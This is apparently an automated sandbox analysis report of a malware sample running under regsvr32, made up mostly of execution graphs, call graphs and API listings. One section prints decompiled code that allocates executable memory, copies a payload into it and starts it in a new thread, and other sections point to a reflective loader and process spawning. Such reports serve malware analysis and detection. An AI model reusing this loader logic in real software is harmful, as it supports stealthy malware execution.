                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:9.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:13.6%
                                                                                                                                                  Total number of Nodes:44
                                                                                                                                                  Total number of Limit Nodes:2

                                                                                                                                                  Graph

                                                                                                                                                  execution_graph 1116 1170000 1118 1170005 1116->1118 1121 117002d 1118->1121 1141 1170456 GetPEB 1121->1141 1124 1170456 GetPEB 1125 1170053 1124->1125 1126 1170456 GetPEB 1125->1126 1127 1170061 1126->1127 1128 1170456 GetPEB 1127->1128 1129 117006d 1128->1129 1130 1170456 GetPEB 1129->1130 1131 117007b 1130->1131 1132 1170456 GetPEB 1131->1132 1135 1170089 1132->1135 1133 11700e4 GetNativeSystemInfo 1134 1170107 VirtualAlloc 1133->1134 1139 1170029 1133->1139 1138 117012f 1134->1138 1135->1133 1135->1139 1136 11703b2 CreateDialogParamW 1136->1139 1138->1136 1140 1170388 VirtualProtect 1138->1140 1140->1138 1140->1139 1142 1170045 1141->1142 1142->1124 1158 117204e 1159 1172065 1158->1159 1162 117092e 1159->1162 1165 117095e 1162->1165 1164 1170959 1167 117097b 1165->1167 1166 11709a5 1166->1164 1167->1166 1168 1170d2d GetPEB 1167->1168 1168->1166 1143 9c1090 1144 9c10ab 1143->1144 1145 9c10d6 VirtualAlloc 1144->1145 1147 9c1107 1144->1147 1145->1144 1146 9c10f6 Sleep 1145->1146 1146->1144 1148 9c111d CreateThread Sleep 1147->1148 1149 dd1fc0 CreateProcessInternalW 1151 dd1e7f 1149->1151 1150 dd2183 Wow64DisableWow64FsRedirection 1150->1151 1151->1149 1151->1150 1152 dd2196 Wow64RevertWow64FsRedirection 1151->1152 1153 dd24fe CreateProcessW 1151->1153 1154 dd2015 GetSystemDirectoryW 1151->1154 1155 dd25a6 1151->1155 1156 dd1f1d 1151->1156 1152->1151 1153->1151 1154->1151 1156->1153 1157 dd1f2c GetProcAddress 1156->1157 1157->1151

                                                                                                                                                  Callgraph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                  • Disassembly available
                                                                                                                                                  callgraph 0 Function_011A7498 1 Function_01173614 32 Function_0117393E 1->32 2 Function_0117281E 24 Function_0117378E 2->24 33 Function_011737BE 2->33 3 Function_01171E1E 4 Function_0117421E 73 Function_0117424E 4->73 5 Function_0117289E 6 Function_01172C1E 7 Function_0117121E 8 Function_0117131E 9 Function_0117119E 10 Function_009C1090 26 Function_009C1000 10->26 11 Function_01173099 12 Function_009F4290 13 Function_00E02AF0 14 Function_01170005 48 Function_0117002D 14->48 15 Function_01173705 15->32 16 Function_01173685 16->32 17 Function_01173302 18 Function_01173181 19 Function_01170000 19->14 20 Function_0117330E 21 Function_01172C0E 22 Function_01172A8E 23 Function_0117298E 29 Function_0117293E 23->29 56 Function_0117295E 23->56 86 Function_0117286E 23->86 93 Function_011728EE 23->93 88 Function_0117336E 24->88 25 Function_01171A8E 25->7 39 Function_009C1030 26->39 27 Function_00DD1FC0 27->13 28 Function_01171CB4 30 Function_0117193E 31 Function_0117163E 65 Function_0117144E 31->65 32->29 82 Function_011729FE 33->82 34 Function_0117333E 35 Function_011719BE 35->7 36 Function_01171BBE 37 Function_011711BE 38 Function_011713BE 40 Function_011A74AE 41 Function_0117122E 42 Function_0117092E 59 Function_0117095E 42->59 43 Function_0117112E 44 Function_01171D2E 44->38 45 Function_011712AE 46 Function_011717AE 46->31 61 Function_011711DE 46->61 90 Function_011715EE 46->90 47 Function_011742AE 47->4 51 Function_01170456 48->51 49 Function_011724AA 50 Function_01170EA8 52 Function_011736D4 52->32 53 Function_011724D3 54 Function_011731D1 55 Function_0117335E 57 Function_0117145E 58 Function_01171D5E 59->30 59->35 59->45 59->46 59->57 78 Function_011711FE 59->78 91 Function_01170FEE 59->91 60 Function_0117125E 69 Function_011711CE 61->69 62 Function_011732C7 63 Function_00DD008E 64 Function_01171ECE 66 Function_0117204E 66->42 81 Function_01171EFE 66->81 67 Function_0117134E 67->8 67->41 67->45 79 Function_011712FE 67->79 68 Function_0117114E 70 Function_01170DCE 70->8 71 Function_01172F4E 72 Function_01172DCE 72->6 77 Function_01172C7E 72->77 74 Function_01172FCE 75 Function_0117374A 75->32 76 Function_009F427A 80 Function_01171CFE 80->38 81->64 83 Function_01172BFD 84 Function_009C11F0 85 Function_01171CEF 85->38 87 Function_0117116E 88->22 88->32 88->71 88->72 88->74 88->93 89 Function_01171B6E 91->79 92 Function_011710EE 94 Function_011736EE 94->32

                                                                                                                                                  Executed Functions

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 dd1fc0-dd1fe9 CreateProcessInternalW 1 dd1fef 0->1 2 dd1ee3-dd1ee8 0->2 3 dd2304-dd2309 1->3 4 dd1eea-dd1eef 2->4 5 dd1f57-dd1f5c 2->5 10 dd230b-dd2310 3->10 11 dd2343-dd2348 3->11 6 dd1ef5-dd1efa 4->6 7 dd1ff4-dd1ff9 4->7 8 dd2053-dd2058 5->8 9 dd1f62-dd1f67 5->9 16 dd20a4-dd20a9 6->16 17 dd1f00-dd1f05 6->17 14 dd1fff-dd2004 7->14 15 dd20f1-dd20f6 7->15 20 dd205e-dd2063 8->20 21 dd211b-dd2120 8->21 22 dd1f6d-dd1f72 9->22 23 dd20d6-dd20db 9->23 12 dd237b-dd2380 10->12 13 dd2312-dd2317 10->13 18 dd234a-dd234f 11->18 19 dd23b4-dd23b9 11->19 40 dd247b-dd2480 12->40 41 dd2386-dd238b 12->41 26 dd231d-dd2322 13->26 27 dd23e7-dd23ec 13->27 30 dd25eb-dd2600 14->30 31 dd200a-dd200f 14->31 28 dd229d-dd22af 15->28 29 dd20fc-dd2101 15->29 42 dd20af-dd20b4 16->42 43 dd2229-dd2256 16->43 34 dd1f0b-dd1f10 17->34 35 dd2183-dd2191 Wow64DisableWow64FsRedirection 17->35 36 dd243c-dd2441 18->36 37 dd2355-dd235a 18->37 24 dd23bf-dd23c4 19->24 25 dd24a6-dd24ab 19->25 38 dd21fd-dd2211 20->38 39 dd2069-dd206e 20->39 32 dd2126-dd212b 21->32 33 dd22b1-dd22ca 21->33 44 dd1f78-dd1f7d 22->44 45 dd21b5-dd21d1 call e02af0 22->45 46 dd2261-dd22fe 23->46 47 dd20e1-dd20e6 23->47 66 dd23ca-dd23cf 24->66 67 dd2591-dd259b 24->67 50 dd24b1-dd24b6 25->50 51 dd25d2-dd25e2 25->51 52 dd2328-dd232d 26->52 53 dd2491-dd249b 26->53 69 dd1e7f-dd1eae 27->69 70 dd23f2-dd23f7 27->70 73 dd22e4-dd22ec 28->73 49 dd1ed8-dd1edd 29->49 54 dd2107-dd2116 29->54 31->49 71 dd2015-dd204e GetSystemDirectoryW 31->71 32->49 55 dd2131-dd2178 32->55 33->2 74 dd22d0 33->74 56 dd2196-dd21aa Wow64RevertWow64FsRedirection 34->56 57 dd1f16-dd1f1b 34->57 60 dd2216-dd221e 35->60 75 dd2447-dd244c 36->75 76 dd25a6-dd25a8 36->76 58 dd24fe-dd252a CreateProcessW 37->58 59 dd2360-dd2365 37->59 38->60 39->49 77 dd2074-dd209f 39->77 79 dd2486-dd248b 40->79 80 dd25b1-dd25c8 call e02af0 40->80 62 dd256e-dd2586 41->62 63 dd2391-dd2396 41->63 42->49 78 dd20ba-dd20d1 42->78 43->2 68 dd225c 43->68 64 dd21d6-dd21f2 44->64 65 dd1f83-dd1f88 44->65 45->73 46->2 46->3 48 dd20ec 47->48 47->49 82 dd22d2-dd22dc 48->82 49->2 49->3 50->49 83 dd24bc-dd24f7 50->83 51->30 93 dd1ed0-dd1ed6 call e02af0 52->93 94 dd2333-dd2338 52->94 53->2 81 dd24a1 53->81 54->73 55->2 84 dd217e 55->84 56->2 85 dd21b0 56->85 57->49 95 dd1f1d-dd1f52 call e02af0 GetProcAddress 57->95 97 dd2534-dd2564 call e02af0 * 2 58->97 96 dd236b-dd2370 59->96 59->97 60->2 89 dd2224 60->89 62->67 63->49 98 dd239c-dd23af 63->98 64->2 87 dd21f8 64->87 65->49 99 dd1f8e-dd1fbe 65->99 66->49 100 dd23d5-dd23dc 66->100 67->2 88 dd25a1 67->88 68->3 69->2 91 dd1eb0 69->91 70->49 101 dd23fd-dd2431 70->101 71->73 73->2 92 dd22f2 73->92 74->3 75->49 102 dd2452-dd2463 75->102 76->80 77->53 78->73 79->49 79->53 80->51 81->3 82->2 105 dd22e2 82->105 83->58 84->3 85->3 87->3 88->3 89->3 91->3 92->3 93->2 120 dd1ecb 93->120 94->49 107 dd233e 94->107 95->73 96->49 109 dd2376 96->109 97->62 110 dd2468-dd2470 98->110 99->0 100->2 111 dd23e2 100->111 101->2 112 dd2437 101->112 102->110 105->3 107->53 109->82 110->2 116 dd2476 110->116 111->3 112->3 116->3 120->3
                                                                                                                                                  APIs
                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 00DD1F39
                                                                                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,00000000), ref: 00DD1FCD
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00DD2020
                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,?,?,?,00000000), ref: 00DD251D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.327710313.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_dd0000_regsvr32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess$AddressDirectoryInternalProcSystem
                                                                                                                                                  • String ID: &+<$&+<$*Tz$etpH$ftpH$ftpH
                                                                                                                                                  • API String ID: 2329590309-1130888923
                                                                                                                                                  • Opcode ID: 97a2c2c24d5269eb127cebf7bce0e9bed6fe5ef81814f459fff49b66f09d3c33
                                                                                                                                                  • Instruction ID: 50bd5c31207dec46712b882ab8612b78dd4cdc3cb7ca1bc9cabc099b22cce385
                                                                                                                                                  • Opcode Fuzzy Hash: 97a2c2c24d5269eb127cebf7bce0e9bed6fe5ef81814f459fff49b66f09d3c33
                                                                                                                                                  • Instruction Fuzzy Hash: 5F023D78209340AFDB28CF58C984A29B7E1EBA9715F24481FF985DB361D671DC84DB23
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 121 9c1090-9c10a4 122 9c10ab-9c10b2 121->122 123 9c10bf-9c10c2 122->123 124 9c10b4-9c10bd 122->124 125 9c10c5-9c10c9 123->125 124->122 126 9c10cb-9c10d4 125->126 127 9c10d6-9c10f4 VirtualAlloc 125->127 126->125 128 9c10f6-9c10fb Sleep 127->128 129 9c1101-9c1105 127->129 128->129 129->127 130 9c1107-9c1142 call 9c1000 CreateThread Sleep 129->130
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E009C1090() {
                                                                                                                                                  				_Unknown_base(*)()* _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				long _v16;
                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                                                  				long _v24;
                                                                                                                                                  				void* _v28;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  				void* _t30;
                                                                                                                                                  
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v24 = 0x5000;
                                                                                                                                                  				while(_v24 > 0x1000) {
                                                                                                                                                  					_v24 = _v24 - 1;
                                                                                                                                                  				}
                                                                                                                                                  				_v16 = _v24;
                                                                                                                                                  				while(_v16 > 0x40) {
                                                                                                                                                  					_v16 = _v16 - 1;
                                                                                                                                                  				}
                                                                                                                                                  				do {
                                                                                                                                                  					_t25 = VirtualAlloc(_v12, 0x43000, _v24, _v16); // executed
                                                                                                                                                  					_v8 = _t25;
                                                                                                                                                  					if(_v8 == 0) {
                                                                                                                                                  						Sleep(0x1f4);
                                                                                                                                                  					}
                                                                                                                                                  				} while (_v8 == 0);
                                                                                                                                                  				_v20 =  &(_v20->nLength);
                                                                                                                                                  				E009C1000(_v20, _v8);
                                                                                                                                                  				_t30 = CreateThread(0, 0, _v8, 0, 0, 0); // executed
                                                                                                                                                  				_v28 = _t30;
                                                                                                                                                  				Sleep(0x4e20); // executed
                                                                                                                                                  				return _t30;
                                                                                                                                                  			}











                                                                                                                                                  0x009c1096
                                                                                                                                                  0x009c109d
                                                                                                                                                  0x009c10a4
                                                                                                                                                  0x009c10ab
                                                                                                                                                  0x009c10ba
                                                                                                                                                  0x009c10ba
                                                                                                                                                  0x009c10c2
                                                                                                                                                  0x009c10c5
                                                                                                                                                  0x009c10d1
                                                                                                                                                  0x009c10d1
                                                                                                                                                  0x009c10d6
                                                                                                                                                  0x009c10e7
                                                                                                                                                  0x009c10ed
                                                                                                                                                  0x009c10f4
                                                                                                                                                  0x009c10fb
                                                                                                                                                  0x009c10fb
                                                                                                                                                  0x009c1101
                                                                                                                                                  0x009c110d
                                                                                                                                                  0x009c1118
                                                                                                                                                  0x009c112b
                                                                                                                                                  0x009c1131
                                                                                                                                                  0x009c1139
                                                                                                                                                  0x009c1142

                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 009C10E7
                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 009C10FB
                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 009C112B
                                                                                                                                                  • Sleep.KERNELBASE(00004E20), ref: 009C1139
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.327659292.00000000009C1000.00000020.00000001.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.327655934.00000000009C0000.00000004.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.327685184.00000000009F5000.00000002.00000001.sdmp Download File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_9c0000_regsvr32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep$AllocCreateThreadVirtual
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 2280809756-2766056989
                                                                                                                                                  • Opcode ID: 16c9070e243be9b948a4b8bba27ce2bf5aefc88d2ead515fcac5b26bd52af4ce
                                                                                                                                                  • Instruction ID: 0d5f4d4f1da8b97c3d0f07d1b4b24358178ac47c2c87df27241aec0e17ff1bea
                                                                                                                                                  • Opcode Fuzzy Hash: 16c9070e243be9b948a4b8bba27ce2bf5aefc88d2ead515fcac5b26bd52af4ce
                                                                                                                                                  • Instruction Fuzzy Hash: BB2129B0E04209EFDB00DFD4C949BBEBBB4FB44305F208558E6056B280C7B55A80DF96
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 133 117002d-117009e call 1170456 * 6 146 11700a7-11700b0 133->146 147 11700a0-11700a2 133->147 146->147 149 11700b2-11700b6 146->149 148 117044e-1170455 147->148 149->147 150 11700b8-11700c2 149->150 151 11700e4-1170105 GetNativeSystemInfo 150->151 152 11700c4-11700c7 150->152 151->147 154 1170107-117012d VirtualAlloc 151->154 153 11700c9-11700cf 152->153 155 11700d6 153->155 156 11700d1-11700d4 153->156 157 1170162-117016c 154->157 158 117012f-1170133 154->158 161 11700d9-11700e2 155->161 156->161 159 11701a4-11701b5 157->159 160 117016e-1170173 157->160 162 1170135-1170138 158->162 164 11701b7-11701d1 159->164 165 1170234-1170240 159->165 163 1170177-117018a 160->163 161->151 161->153 166 1170153-1170155 162->166 167 117013a-1170142 162->167 169 117018c-1170193 163->169 170 1170199-117019e 163->170 186 11701d3 164->186 187 1170222-117022e 164->187 171 1170246-117025d 165->171 172 11702f0-11702fa 165->172 168 1170157-117015c 166->168 167->166 173 1170144-1170147 167->173 168->162 174 117015e 168->174 169->169 175 1170195 169->175 170->163 178 11701a0 170->178 171->172 179 1170263-1170273 171->179 176 11703b2-11703ce CreateDialogParamW 172->176 177 1170300-1170307 172->177 181 117014e-1170151 173->181 182 1170149-117014c 173->182 174->157 175->170 197 11703d0-11703d4 176->197 198 117044c 176->198 183 1170309-1170312 177->183 178->159 184 11702d5-11702e6 179->184 185 1170275-1170279 179->185 181->168 182->166 182->181 192 11703a7-11703ac 183->192 193 1170318-1170333 183->193 184->179 190 11702ec 184->190 194 117027a-1170289 185->194 188 11701d7-11701db 186->188 187->164 191 1170230 187->191 195 11701dd 188->195 196 11701fb-1170204 188->196 190->172 191->165 192->176 192->183 199 1170335-1170337 193->199 200 117034d-117034f 193->200 201 1170291-117029a 194->201 202 117028b-117028f 194->202 195->196 206 11701df-11701f9 195->206 215 1170207-117021c 196->215 197->198 207 11703d6-11703e0 197->207 198->148 208 1170340-1170343 199->208 209 1170339-117033e 199->209 204 1170351-1170353 200->204 205 1170368-117036a 200->205 203 11702c3-11702c7 201->203 202->201 210 117029c-11702a1 202->210 203->194 217 11702c9-11702d1 203->217 213 1170355-1170357 204->213 214 1170359-117035b 204->214 218 1170371-1170376 205->218 219 117036c 205->219 206->215 207->198 216 11703e2-11703e6 207->216 220 1170345-117034b 208->220 209->220 211 11702b4-11702b7 210->211 212 11702a3-11702b2 210->212 211->203 222 11702b9-11702bf 211->222 212->203 223 117036e-117036f 213->223 214->205 224 117035d-117035f 214->224 215->188 226 117021e 215->226 216->198 225 11703e8-11703f9 216->225 217->184 221 1170379-1170380 218->221 219->223 220->221 229 1170382 221->229 230 1170388-117039d VirtualProtect 221->230 222->203 223->221 224->221 227 1170361-1170366 224->227 225->198 228 11703fb-1170400 225->228 226->187 227->221 231 1170402-117040f 228->231 229->230 230->147 232 11703a3 230->232 231->231 233 1170411-1170415 231->233 232->192 234 1170417-1170429 233->234 235 117042d-1170433 233->235 234->228 236 117042b 234->236 235->198 237 1170435-117044b 235->237 236->198 237->198
                                                                                                                                                  APIs
                                                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,01170005), ref: 011700E9
                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,01170005), ref: 01170111
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.327891916.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1170000_regsvr32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocInfoNativeSystemVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2032221330-0
                                                                                                                                                  • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                                                                                                  • Instruction ID: 26644cda8c892086fe7eafac60ade70ebc53d6d4bd53b22ab2f5b62f7692d286
                                                                                                                                                  • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                                                                                                  • Instruction Fuzzy Hash: D9D19C71A087069FD728CF69C88076AB7F0BF8A318F18452DF9959B341E774E845CB92
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 297 117095e-11709a3 call 117145e 302 11709a5-11709a7 297->302 303 11709ac-11709bd 297->303 304 1170dbb-1170dbe 302->304 305 11709d1-11709ec call 117145e 303->305 306 11709bf-11709cc 303->306 310 11709f5-1170a0a 305->310 311 11709ee-11709f0 305->311 306->304 312 1170a1e-1170a2b 310->312 313 1170a0c-1170a19 310->313 311->304 314 1170a3f-1170a48 312->314 315 1170a2d-1170a3a 312->315 313->304 316 1170a5c-1170a7d 314->316 317 1170a4a-1170a57 314->317 315->304 320 1170a91-1170a9b 316->320 317->304 322 1170ad3-1170b03 call 11711fe * 2 320->322 323 1170a9d-1170aa4 320->323 335 1170b17-1170b3a 322->335 336 1170b05-1170b12 322->336 324 1170aa6-1170ab2 323->324 325 1170ab4-1170ac0 323->325 327 1170ac3-1170ac9 324->327 325->327 329 1170ad1 327->329 330 1170acb-1170ace 327->330 329->320 330->329 339 1170b3c-1170b5a 335->339 340 1170b6b-1170b83 335->340 336->304 339->340 343 1170b5c-1170b66 339->343 346 1170b85-1170ba4 340->346 347 1170ba9-1170bbf 340->347 343->304 346->304 348 1170bc1-1170bc8 347->348 349 1170bca 347->349 350 1170bd1-1170c2e call 117145e 348->350 349->350 355 1170c35-1170c9e call 11712ae call 117147e 350->355 356 1170c30 350->356 365 1170ca5-1170cb6 355->365 366 1170ca0 355->366 357 1170dad-1170db9 call 1170fee 356->357 357->304 367 1170cd0-1170cd3 365->367 368 1170cb8-1170cce call 11719be 365->368 366->357 369 1170cda-1170ce8 call 1171ace 367->369 368->369 374 1170cef-1170cfd call 11717ae 369->374 375 1170cea 369->375 378 1170d04-1170d12 call 117193e 374->378 379 1170cff 374->379 375->357 382 1170d14 378->382 383 1170d19-1170d22 378->383 379->357 382->357 384 1170d24-1170d2b 383->384 385 1170d9e-1170da1 383->385 387 1170d2d-1170d89 GetPEB 384->387 388 1170d8b-1170d99 384->388 386 1170da8-1170dab 385->386 386->304 389 1170d9c 387->389 388->389 389->386
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.327891916.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1170000_regsvr32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                  • Instruction ID: 94b3ba4760a2f41489ceb452143b773ecccda4af6b5a78c63fd843e303249263
                                                                                                                                                  • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                  • Instruction Fuzzy Hash: 61F1FAB4A01209EFDB08DF94C994AAEB7B5FF4C304F208598E906AB345D775EE41CB91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.327891916.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_1170000_regsvr32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                                                                                                  • Instruction ID: 9d16c1f64becfb51bb2dd0e816d12cf5dbb29696f7e60efa929386d25bd353c2
                                                                                                                                                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                                                                                                  • Instruction Fuzzy Hash: B63180766047468FD714DF1CC480926B7F4FF8A214F0A096DFA9687312D334F9468B91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%